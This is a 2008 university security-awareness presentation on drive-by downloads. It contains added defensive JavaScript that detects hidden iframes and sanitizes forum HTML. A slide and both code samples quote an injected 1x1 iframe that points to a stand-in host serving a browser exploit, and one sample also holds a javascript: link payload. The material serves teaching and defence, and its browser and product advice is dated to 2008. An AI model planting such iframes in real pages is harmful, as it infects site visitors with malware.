Protecting Yourself On-line
Carol Taylor, Assistant Professor, Computer Science, EWU
Skye Hagen, Assistant Director, Office of Information Technology, EWU
QSI Conference, August 26-27, 2008
Overview
Security: User Responses
Motivation
Drive-by Downloads
Defining the problem
Examples
Recommendations
User Survey
How many people use anti-virus? Do you keep it up to date?
How many people use anti-spyware programs?
Do you use firewall programs? (Windows Firewall, Comodo Firewall Pro, others)
Do you back up the data on your computer?
Motivation
Why should you be concerned with Web security?
"I only shop at legitimate sites, I don't ever visit sites with questionable content." Is that enough to keep you safe?
That's not enough to keep you safe in the current Web environment.
Surfing regular e-commerce sites can infect your computer.
Motivation
Statistics show that Web security is getting worse.
ScanSafe reported a 220% increase in the amount of Web-based malware over the period 2007-2008.
The volume of backdoor and password-stealing malware blocked by the firm increased by an order of magnitude: 855% between May 2007 and May 2008.
Motivation
A website infected with malware is detected every five seconds (2008). That represents a dramatic increase over the last 12 months.
Websites poisoned with malware capable of infecting visitors' machines are being discovered at a rate of 16,173 per day, three times faster than in 2007.
http://www.reuters.com/article/pressRelease/idUS120735+23-Jul-2008+BW20080723
More Motivation
Antivirus firm Sophos found that more than 90% of web pages capable of spreading Trojan horses and spyware are legitimate websites.
Recent infected websites include those of ITV, Sony PlayStation, a golf page on the BBC site, and a variety of other commercial sites.
Blogspot.com, the blog publishing system owned by Google, was found to be hosting two per cent of the world's web-based malware in June 2008.
Motivation Summary
The threats are real!!!!
The Internet is an amazing collection of entertainment, knowledge, social opportunities and goods, but ...
The Internet is also a mirror for society. Crime, fraud, personal safety and privacy threats are real, just like in the real world.
The main difference is that the threats are hidden; the risk is not obvious.
You must protect yourself from these real dangers.
Drive-by Downloads
This attack takes advantage of known vulnerabilities in browsers and operating systems.
In a drive-by, an unsuspecting user (you) downloads and installs software without ever knowing it while surfing the web.
It can happen when you agree to install browser plugins, run a Java applet or JavaScript, or launch ActiveX applications.
However, it can also happen without you doing anything: there are Web pages modified with code that redirects visitors to another site infected with malware that can break into your PC, without you even realizing it.
Definitions
ActiveX Control (ActiveX): A program which can be embedded in a web page or downloaded from a web page and executed from within the browser itself. A browser must support ActiveX controls for this to work.
JavaScript: A scripting language, based on both Java and C++, used to create code that is commonly embedded into HTML on web pages for enhanced functionality, for instance validation of user-typed input on a form.
Java Applet: An applet is a small program, usually embedded in a web page, which can perform a number of duties such as playing audio or video clips and querying a database. These programs are normally written in Java.
Drive-by Downloads
Unsuspecting users are victimized by simply doing what they do hundreds of times each day: visiting a Web page.
Then, while you browse content normally, a computer virus or Trojan horse program is silently installed.
Drive-by Downloads
Drive-by downloads are not new, but criminals have seized on the tactic lately because their success rate with traditional e-mail viruses has tapered off.
Avoiding e-mail viruses is not always easy, but you are more likely to avoid them as long as you follow clear rules like "don't click on any attachments".
But drive-by downloads are much more sinister: no user interaction is generally required beyond opening an infected site in a Web browser.
Scope of the Problem
http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html
Google crawled billions of Web pages and found more than 3,000,000 unique URLs on over 180,000 web sites automatically installing malware.
[Graph: percentage of daily Google queries that contained at least one harmful site, 2007]
Drive-by Downloads
How Web sites get infected
One injection technique: gain access to the Web server that hosts the site.
The attacker injects new content into the compromised website.
Typically, the injected content is a link that redirects visitors of these websites to a URL that hosts a script crafted to exploit the browser.
To avoid visual detection by website owners, attackers use invisible HTML components, e.g., zero-pixel IFRAMEs hide the injected content.
Example of Web Server Compromise – "Italian Job"
2007: Online criminals launched a Web attack that compromised thousands of legitimate Web sites.
Infected Web sites contain HTML "iFrame" code that redirects the victim's browser to a server that attempts to infect the victim's computer.
Internet Explorer, Firefox, and Opera are vulnerable.
Keyloggers and a Trojan downloader program were found on compromised PCs, so attackers can monitor the victim's activity and run other unauthorized programs on the computer.
"They can turn your computer into anything they want."
http://www.networkworld.com/news/2007/061907-italian-job-web-attack.html
Example of Web Server Compromise – iFrame Example
The following code is injected into web pages. The size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code:

<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

On the above server, remote.example.com, the index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer.
The executable was recognized by about half of anti-virus tools as a spyware trojan.

Steps for Drive-by Download
The browser gets redirected by the hidden link to remote.example.com.
It downloads and executes the hidden malware from index.html.
http://research.google.com/archive/provos-2008a.pdf
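The hidden-frame pattern shown above (a 1x1 iframe pointing at a remote host) can be checked for on your own pages. The following Node.js script is an added example written for this transcript; it is not code from the presentation or its sources. It scans a page's HTML for iframes that are too small to see, hidden via CSS, or sourced from a host other than the page's own. The page host, the example.com / example.net / example.org names and the sample page are constructed placeholders.

```javascript
// Added example (not from the presentation): scan a page's HTML for the
// hidden-iframe injection pattern the slides describe (1x1 / 0x0 frames,
// CSS-hidden frames) and note when a frame pulls content from another host.
// Hostnames and the sample page below are constructed placeholders.

const HIDDEN_STYLE = /display\s*:\s*none|visibility\s*:\s*hidden/i;

// Parse one tag's attribute list into a prototype-less object (lower-cased
// names). Accepts double-quoted, single-quoted and unquoted values and
// whitespace around "=", as in the slide's `src= http://...` sample.
function parseAttributes(tagBody) {
  const attrs = Object.create(null);
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Why one iframe looks like an injection: too small to see, hidden via CSS,
// or sourced from a host other than the page's own.
function iframeReasons(attrs, pageHost) {
  const reasons = [];
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  if ((Number.isFinite(w) && w <= 1) || (Number.isFinite(h) && h <= 1)) reasons.push('tiny');
  if (attrs.style !== undefined && HIDDEN_STYLE.test(attrs.style)) reasons.push('css-hidden');
  if (attrs.src !== undefined) {
    try {
      // The page's own host is the base, so relative src values stay on-site.
      const host = new URL(attrs.src, `http://${pageHost}/`).hostname;
      if (host !== pageHost.toLowerCase()) reasons.push(`off-site:${host}`);
    } catch (e) {
      reasons.push('unparseable-src');
    }
  }
  return reasons;
}

// Scan a document; returns one finding per suspicious <iframe>.
function findHiddenIframes(html, pageHost) {
  const findings = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[1]);
    const reasons = iframeReasons(attrs, pageHost);
    if (reasons.length > 0) findings.push({ src: attrs.src ?? '', reasons });
  }
  return findings;
}

// Constructed sample page: the frame from the slide, a CSS-hidden frame, and a
// legitimate same-site video embed that must not be flagged.
const SAMPLE_PAGE = `<html><body>
<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src="http://ads.example.net/x.html" style="display:none"></iframe>
<iframe src="/player.html" width="640" height="360"></iframe>
</body></html>`;

for (const f of findHiddenIframes(SAMPLE_PAGE, 'www.example.org')) {
  console.log(`${f.src || '(no src)'}  [${f.reasons.join(', ')}]`);
}
```

Run it over a saved copy of a page you maintain and review anything it flags; the two constructed frames above are reported while the same-site player embed is not. It is a static heuristic over the HTML as served: frames created later by script, or hidden by positioning rather than size, will not be caught, so treat it as a quick check alongside the patching and browser hardening the later slides recommend.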
Drive-by Downloads
How Web sites get infected
Another common injection technique: use websites that allow users to contribute their own content, e.g., postings to forums or blogs.
User-contributed content may be restricted to text but often can also contain HTML such as links to images or other external content.
The adversary can simply inject the exploit URL without the need to compromise the web server.
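If a forum or blog accepts HTML from contributors, the site itself has to decide what markup survives. The following Node.js sanitizer is an added example for this transcript, not code from the presentation or from any forum software: it keeps a small allowlist of tags, accepts only double-quoted attributes from a fixed list, rejects links that are not http(s), and removes iframe/script/object/embed elements together with their contents. The tag list, the forum.example base URL and the sample post are assumptions constructed for the example.

```javascript
// Added example (not from the presentation): an allowlist sanitizer for
// user-contributed HTML (forum posts, blog comments), so a contributor cannot
// inject an exploit-hosting iframe, a script, or a javascript: link.
// The sample post is constructed; hostnames are placeholders.

// Tag -> attributes it may keep. Anything not listed is dropped.
const ALLOWED = new Map([
  ['b', []], ['i', []], ['em', []], ['strong', []], ['p', []], ['br', []],
  ['a', ['href']], ['img', ['src', 'alt']],
]);
// Elements removed together with everything inside them.
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'applet']);

// Only http(s) URLs survive; javascript:, data:, vbscript: etc. are rejected.
// A base URL makes relative links resolve to http: instead of throwing.
function safeUrl(value) {
  try {
    const protocol = new URL(value, 'http://forum.example/').protocol;
    return protocol === 'http:' || protocol === 'https:';
  } catch (e) {
    return false;
  }
}

function escapeText(text) {
  return text.replace(/&(?![a-zA-Z]+;|#\d+;)/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function escapeAttr(value) {
  return value.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
}

// Rebuild an allowed opening tag from scratch, keeping only listed attributes
// written in the strict name="value" form; anything else (on* handlers,
// unquoted or single-quoted values, style) is discarded.
function rebuildTag(name, body) {
  let out = `<${name}`;
  const attrRe = /([a-zA-Z-]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = attrRe.exec(body)) !== null) {
    const key = m[1].toLowerCase();
    if (!ALLOWED.get(name).includes(key)) continue;
    if ((key === 'href' || key === 'src') && !safeUrl(m[2])) continue;
    out += ` ${key}="${escapeAttr(m[2])}"`;
  }
  return out + '>';
}

function sanitizeUserHtml(html) {
  let out = '';
  let skipUntil = null; // element name while inside a dropped-with-content element
  const tokenRe = /<!--[\s\S]*?-->|<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>|[^<]+|</g;
  let m;
  while ((m = tokenRe.exec(html)) !== null) {
    const [token, slash, rawName, body] = m;
    const name = rawName ? rawName.toLowerCase() : null;
    if (skipUntil !== null) {
      if (name === skipUntil && slash) skipUntil = null;
      continue;
    }
    if (name === null) {                       // text, a stray '<', or a comment
      if (!token.startsWith('<!--')) out += escapeText(token);
    } else if (DROP_WITH_CONTENT.has(name)) {
      if (!slash) skipUntil = name;
    } else if (!ALLOWED.has(name)) {
      // unknown tag: drop the tag itself, keep whatever text it wrapped
    } else if (slash) {
      out += `</${name}>`;
    } else {
      out += rebuildTag(name, body);
    }
  }
  return out;
}

// Constructed forum post: an injected 1x1 frame, a javascript: link with an
// event handler, a legitimate link and some plain text containing '<'.
const SAMPLE_POST = 'Nice <b>post</b>! '
  + '<iframe src="http://remote.example.com/index.html" width="1" height="1"></iframe>'
  + '<a href="javascript:alert(1)" onclick="x()">click</a> '
  + '<a href="https://www.example.org/">ok</a> 1 < 2';

console.log(sanitizeUserHtml(SAMPLE_POST));
```

The injected frame disappears entirely, the javascript: link is reduced to a bare anchor, and the plain-text "<" is encoded. The design choice is to rebuild output from an allowlist rather than to strip known-bad patterns, so anything the code does not recognise is dropped by default. The regex tokenizer is enough to illustrate the idea; a production site should use a maintained sanitizer library that tracks browser parsing quirks.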
Example of User Contributed Content Compromise - Blog
WordPress is the most popular software for blogs.
You should use the current installation of WordPress (WP), version 2.5.1.
There is an increasing number of blogs, all with version WP 2.3 and earlier, getting "hit" by the well-known iFrame exploit that infects website visitors with a trojan download.
Advice from Marc Liron – Sitebuilder pro
Example of User Contributed Content Compromise - Blog
Author Marc Liron had trouble loading a site from well-known Internet marketer Stu McLaren, so he attempted to access Stu's blog (June 2008): http://myideaguy.com/blog/ (DO NOT GO THERE)
A few moments after visiting the section http://myideaguy.com/blog/category/products/ (DO NOT GO THERE), his installation of Kaspersky Security Suite ALERTED that a TROJAN infection was trying to infect his computer!!!
The culprit was: Trojan-Downloader.HTML.Agent.is
http://www.marcliron.co.uk/sitebuilditreview/stu-mclarens-blog-gets-infected-by-hackers
Google Flags Malicious Sites
Site has repeated problems: http://www.wowstatus.net/ (a World of Warcraft site)
Google flagged it as hosting malicious content: http://www.google.com/interstitial?url=http://www.wowstatus.net/
This is one way sites are being flagged to alert you. However, not all sites are flagged ....
Signs You Are Infected
Spyware alerts after you have visited a site
You see a program pop up that you never loaded, and it asks you to do something (don't do it!)
Web browser's home page changed
Browser has new bookmarks
Pop-up window advertisements
Unusual files on your computer
User Behavior
If you think you have been infected, don't say yes to anything. Close pop-up windows that appear.
You get an offer to help you clean up your computer and remove spyware. As one researcher put it, "I rob you, then I run back and offer to help identify the culprit that did it." Not too helpful ...
Example Problem Pop-Up
If you click "Yes," spyware is installed.
Note that the presence of a security certificate is no guarantee that something is not spyware.
Protection from Drive-by Downloads
Keep the operating system patched and up to date. Turn on automatic updates for the OS.
Windows XP settings: choose Control Panel, then System. Open the System tool and turn on Automatic Updates.
Protection from Drive-by Downloads
Use the latest browser (Firefox, Internet Explorer, Opera). Keep browsers patched and up to date. Turn on automated updates for the browser.
Firefox: the current version is 2.0.0.16, and automatic update is enabled by default. To see the option, go to Tools > Options > Advanced > Update.
Internet Explorer is up to version 7. It was an automatic update by MS. Use this latest version!!! It has phishing protection built in.
Protection from Drive-by Downloads
Install several programs for removing spyware and viruses – these are free!!!
Ad-Aware SE: http://lavasoft.com/single/trialpay.php
Spybot Search and Destroy: http://www.safer-networking.org/en/index.html
AVG – virus program: http://free.avg.com/
Avira AntiVir – another virus program: http://www.free-av.com/
http://www.viewpoints.com/Avira-AntiVir-Personal-Edition-Classic-review-5ed2029
Protection from Drive-by Downloads
Harden your Web browser.
Medium security is not good enough; set it to higher.
Disable active scripting or have it prompt you. If you have problems, add sites to an accepted list.

Firefox: Open the "Tools" menu. Select "Options". Click "Content". Click the check box to the left of "Disable JavaScript" so that a tick appears.
IE7: Open the "Tools" menu. Select "Internet Options...". Click the "Security" tab. Click the "Internet" symbol (a globe). Click "Custom Level...". In the Settings list, scroll down to "Scripting". Under Active Scripting, click "Disable".
Protection from Drive-by Downloads
Another way to protect yourself is by virtualizing your Web session, using ZoneAlarm's ForceField.
The virtualization technology in ForceField forms a "bubble of security" around the Web browser, so that all unknown or unwanted changes from drive-by downloads are made to a virtualized file system and disappear completely once the user is finished surfing.
ForceField's virtualization claims to offer additional security by protecting the browser session from any malware that might be on the PC.
http://www.zonealarm.com/store/content/catalog/products/zonealarm_forcefield.jsp
More protection using a free browser toolbar: Haute Secure
A company started by Microsoft employees. They produce a free toolbar supposed to protect you from bad web sites.
Seems to be a good product. You can try it and report back.
http://hautesecure.com/solutions.aspx
Summary
The Internet is a scary place. A great place to hang out but ... dangerous too.
Ignore security? Sure .... The result is that your computer can be used for spam or to commit crime. Your sensitive data can be compromised. You will be a victim of theft. Your computer may be unusable.
Pay some attention, get or buy security software ... Security is a process!!!
Resources
EWU Security Awareness Site: http://www.ewu.edu/securityawareness
SANS Reading Room – lots of technical papers: http://www.sans.org/reading_room/
Drive-by Download Video: http://video.google.com/videoplay?docid=-3351512772400238297&ei=IPK0SLreOZTcqgOWjum9DA&q=Drive+by+download+%2B+watchgaurd&hl=en
StopBadware.org – search for bad websites: http://www.stopbadware.org/home/clearinghouse
Re-installing Windows XP – last resort: http://www.pcworld.com/article/129977/how_to_reinstall_windows_xp.html

This presentation can be found at http://www.ewu.edu/securityawareness
My email: [email protected]
Questions